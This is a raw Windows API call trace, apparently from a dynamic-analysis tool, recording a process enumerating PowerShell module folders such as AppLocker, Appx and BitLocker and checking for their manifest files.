	[0046.657] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0046.657] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45
	[0046.658] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8220
	[0046.658] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.659] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.659] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.659] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.659] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.659] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.659] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.660] CoTaskMemAlloc (cb=0x214) returned 0x1505fbbdda0
	[0046.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505fbbdda0, nSize=0x108 | out: lpBuffer="                   <TableColumnHeader>\r\n                        <Width>30</Width>\r\n                    </TableColumnHeader>\r\n                    <TableColumnHeader />\r\n                </TableHeaders>\r\n                <TableRowEntries>\r\n                    <TableRo") returned 0x0
	[0046.660] CoTaskMemFree (pv=0x1505fbbdda0) 
	[0046.661] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0046.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.661] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.661] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0046.661] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45
	[0046.662] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8880
	[0046.662] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.662] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.662] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.663] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.663] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.663] FindNextFileW (in: hFindFile=0x1505fab8880, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.663] FindClose (in: hFindFile=0x1505fab8880 | out: hFindFile=0x1505fab8880) returned 1
	[0046.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.664] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20
	[0046.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.665] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c
	[0046.665] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d
	[0046.666] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7620
	[0046.666] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.666] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.666] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.666] FindClose (in: hFindFile=0x1505fab7620 | out: hFindFile=0x1505fab7620) returned 1
	[0046.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.666] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c
	[0046.666] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d
	[0046.666] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab74a0
	[0046.667] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.667] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.667] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.667] FindClose (in: hFindFile=0x1505fab74a0 | out: hFindFile=0x1505fab74a0) returned 1
	[0046.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.667] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c
	[0046.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.667] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.667] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c
	[0046.667] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d
	[0046.667] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7da0
	[0046.667] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.668] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.668] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.668] FindClose (in: hFindFile=0x1505fab7da0 | out: hFindFile=0x1505fab7da0) returned 1
	[0046.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.668] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20
	[0046.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.669] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37
	[0046.669] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38
	[0046.669] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8400
	[0046.669] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.669] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.670] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.670] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.670] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.670] FindNextFileW (in: hFindFile=0x1505fab8400, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.670] FindClose (in: hFindFile=0x1505fab8400 | out: hFindFile=0x1505fab8400) returned 1
	[0046.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.670] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37
	[0046.670] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38
	[0046.670] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7e00
	[0046.670] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.671] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.671] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.671] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.671] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.671] FindNextFileW (in: hFindFile=0x1505fab7e00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.671] FindClose (in: hFindFile=0x1505fab7e00 | out: hFindFile=0x1505fab7e00) returned 1
	[0046.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.671] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37
	[0046.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.671] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.671] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37
	[0046.671] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38
	[0046.671] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8220
	[0046.672] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.672] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.672] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.672] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.672] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.672] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.672] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.673] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20
	[0046.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.673] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41
	[0046.673] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42
	[0046.673] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab79e0
	[0046.673] FindNextFileW (in: hFindFile=0x1505fab79e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.673] FindNextFileW (in: hFindFile=0x1505fab79e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.673] FindNextFileW (in: hFindFile=0x1505fab79e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.673] FindNextFileW (in: hFindFile=0x1505fab79e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.673] FindNextFileW (in: hFindFile=0x1505fab79e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.674] FindClose (in: hFindFile=0x1505fab79e0 | out: hFindFile=0x1505fab79e0) returned 1
	[0046.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.674] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41
	[0046.674] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42
	[0046.674] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0046.674] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.674] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.674] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.674] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.675] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.675] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.675] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41
	[0046.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.675] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.675] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41
	[0046.675] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42
	[0046.675] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7ec0
	[0046.675] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.675] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.676] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.676] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.676] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.676] FindClose (in: hFindFile=0x1505fab7ec0 | out: hFindFile=0x1505fab7ec0) returned 1
	[0046.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.676] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20
	[0046.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.677] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c
	[0046.677] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d
